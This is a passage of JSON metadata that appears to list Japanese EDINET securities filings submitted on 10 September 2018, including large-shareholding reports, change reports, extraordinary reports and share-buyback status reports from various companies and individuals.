"filerName": "株式会社ワールド",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "053001",
"docTypeCode": "190",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:02",
"docDescription": "訂正臨時報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第19条第2項第1号",
"parentDocID": "S100DZKI",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 206,
"docID": "S100E2BI",
"edinetCode": "E31866",
"secCode": null,
"JCN": null,
"filerName": "BENEFIT POWER INC.",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010000",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:06",
"docDescription": "大量保有報告書",
"issuerEdinetCode": "E00745",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 207,
"docID": "S100E2A6",
"edinetCode": "E31866",
"secCode": null,
"JCN": null,
"filerName": "BENEFIT POWER INC.",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010000",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:08",
"docDescription": "大量保有報告書",
"issuerEdinetCode": "E01088",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 208,
"docID": "S100E2X2",
"edinetCode": "E34365",
"secCode": null,
"JCN": null,
"filerName": "山中賢一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:20",
"docDescription": "変更報告書",
"issuerEdinetCode": "E02118",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 209,
"docID": "S100E34V",
"edinetCode": "E33699",
"secCode": null,
"JCN": null,
"filerName": "足立 秀之",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:20",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E33583",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E21O",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 210,
"docID": "S100E2X5",
"edinetCode": "E34365",
"secCode": null,
"JCN": null,
"filerName": "山中賢一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:21",
"docDescription": "変更報告書",
"issuerEdinetCode": "E02118",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 211,
"docID": "S100E30K",
"edinetCode": "E33853",
"secCode": null,
"JCN": "9290001041304",
"filerName": "株式会社レモンガスふくおか",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:24",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E00424",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100DYIO",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 212,
"docID": "S100E2YE",
"edinetCode": "E00094",
"secCode": "19510",
"JCN": "3011001031955",
"filerName": "株式会社協和エクシオ",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:27",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 213,
"docID": "S100E2X8",
"edinetCode": "E34365",
"secCode": null,
"JCN": null,
"filerName": "山中賢一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:29",
"docDescription": "変更報告書",
"issuerEdinetCode": "E02118",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 214,
"docID": "S100E34J",
"edinetCode": "E34365",
"secCode": null,
"JCN": null,
"filerName": "山中賢一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:31",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E02118",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E2UX",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 215,
"docID": "S100E34N",
"edinetCode": "E22460",
"secCode": "36350",
"JCN": "4020001061110",
"filerName": "株式会社コーエーテクモホールディングス",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "053000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:31",
"docDescription": "臨時報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第19条第2項第2号の2",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 216,
"docID": "S100E2UV",
"edinetCode": "E26549",
"secCode": "29300",
"JCN": "8430001028254",
"filerName": "株式会社北の達人コーポレーション",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:31",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 217,
"docID": "S100E351",
"edinetCode": "E01496",
"secCode": "61350",
"JCN": "7013201005504",
"filerName": "株式会社 牧野フライス製作所",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:35",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 218,
"docID": "S100E2UB",
"edinetCode": "E05923",
"secCode": null,
"JCN": null,
"filerName": "コーペラティブ・ラボバンク・ウー・アー",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "100000",
"docTypeCode": "160",
"periodStart": "2018-01-01",
"periodEnd": "2018-12-31",
"submitDateTime": "2018-09-10 15:35",
"docDescription": "半期報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 219,
"docID": "S100E30B",
"edinetCode": "E27510",
"secCode": null,
"JCN": "9011103004226",
"filerName": "合同会社城山21世紀投資",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:36",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S1002TXE",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 220,
"docID": "S100E2XI",
"edinetCode": "E24546",
"secCode": null,
"JCN": "8013301017357",
"filerName": "株式会社リトル・アイ",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:37",
"docDescription": "変更報告書",
"issuerEdinetCode": "E33037",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100A01L",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 221,
"docID": "S100E30L",
"edinetCode": "E27510",
"secCode": null,
"JCN": "9011103004226",
"filerName": "合同会社城山21世紀投資",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:37",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S1003VEM",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 222,
"docID": "S100E30O",
"edinetCode": "E27510",
"secCode": null,
"JCN": "9011103004226",
"filerName": "合同会社城山21世紀投資",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:42",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S1005B5W",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 223,
"docID": "S100E310",
"edinetCode": "E02676",
"secCode": "81540",
"JCN": "4010001001752",
"filerName": "加賀電子株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "053000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:42",
"docDescription": "臨時報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第19条第2項第3号,第19条第2項第8号の2",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 224,
"docID": "S100E30Y",
"edinetCode": "E27510",
"secCode": null,
"JCN": "9011103004226",
"filerName": "合同会社城山21世紀投資",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:43",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S1008VBB",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 225,
"docID": "S100E35C",
"edinetCode": "E01797",
"secCode": "67940",
"JCN": "8012801002521",
"filerName": "フォスター電機株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:46",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 226,
"docID": "S100E31D",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010000",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:50",
"docDescription": "大量保有報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 227,
"docID": "S100E35I",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:57",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 228,
"docID": "S100E2VQ",
"edinetCode": "E33066",
"secCode": null,
"JCN": null,
"filerName": "金森 勉",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 15:58",
"docDescription": "変更報告書",
"issuerEdinetCode": "E32990",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 229,
"docID": "S100E35L",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:00",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 230,
"docID": "S100E2Z2",
"edinetCode": "E00913",
"secCode": "46260",
"JCN": "3011601003833",
"filerName": "太陽ホールディングス株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:00",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 231,
"docID": "S100E24E",
"edinetCode": "E07361",
"secCode": null,
"JCN": "8010401029670",
"filerName": "森トラスト株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "020002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:03",
"docDescription": "変更報告書(短期大量譲渡)",
"issuerEdinetCode": "E03946",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 232,
"docID": "S100E34H",
"edinetCode": "E03946",
"secCode": null,
"JCN": "4140001000056",
"filerName": "アーバンライフ株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "053000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:08",
"docDescription": "臨時報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第19条第2項第4号の2",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 233,
"docID": "S100E35O",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:14",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 234,
"docID": "S100E35R",
"edinetCode": "E25160",
"secCode": null,
"JCN": "6011101059489",
"filerName": "ゼニス羽田ホールディングス株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:17",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 235,
"docID": "S100E35X",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:30",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 236,
"docID": "S100E365",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:33",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 237,
"docID": "S100E367",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:36",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 238,
"docID": "S100E36A",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:39",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 239,
"docID": "S100E22C",
"edinetCode": "E09302",
"secCode": null,
"JCN": "1010401010604",
"filerName": "株式会社ゴルフダイジェスト社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:41",
"docDescription": "変更報告書",
"issuerEdinetCode": "E05391",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 240,
"docID": "S100E2DC",
"edinetCode": "E10670",
"secCode": null,
"JCN": "2010001066608",
"filerName": "シンプレクス・アセット・マネジメント株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:42",
"docDescription": "変更報告書",
"issuerEdinetCode": "E02002",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S1001GCY",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 241,
"docID": "S100E2H0",
"edinetCode": "E09301",
"secCode": null,
"JCN": null,
"filerName": "木村 玄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:42",
"docDescription": "変更報告書",
"issuerEdinetCode": "E05391",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 242,
"docID": "S100E36C",
"edinetCode": "E34376",
"secCode": null,
"JCN": null,
"filerName": "脇田 栄一",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:46",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04055",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E31D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 243,
"docID": "S100E35B",
"edinetCode": "E12431",
"secCode": null,
"JCN": "3010001068479",
"filerName": "BNPパリバ・アセットマネジメント株式会社",
"fundCode": "G07943",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:49",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100B94Y",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 244,
"docID": "S100E30E",
"edinetCode": "E31925",
"secCode": "14350",
"JCN": "3290001025873",
"filerName": "株式会社TATERU",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "020002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:50",
"docDescription": "変更報告書(短期大量譲渡)",
"issuerEdinetCode": "E34177",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 245,
"docID": "S100DZGK",
"edinetCode": "E12431",
"secCode": null,
"JCN": "3010001068479",
"filerName": "BNPパリバ・アセットマネジメント株式会社",
"fundCode": "G07943",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-06-13",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 16:51",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第9期(平成29年6月13日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 246,
"docID": "S100E35J",
"edinetCode": "E02350",
"secCode": "62660",
"JCN": "6260001018266",
"filerName": "タツモ株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "023001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:53",
"docDescription": "訂正有価証券届出書(参照方式)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E1JW",
"opeDateTime": null,
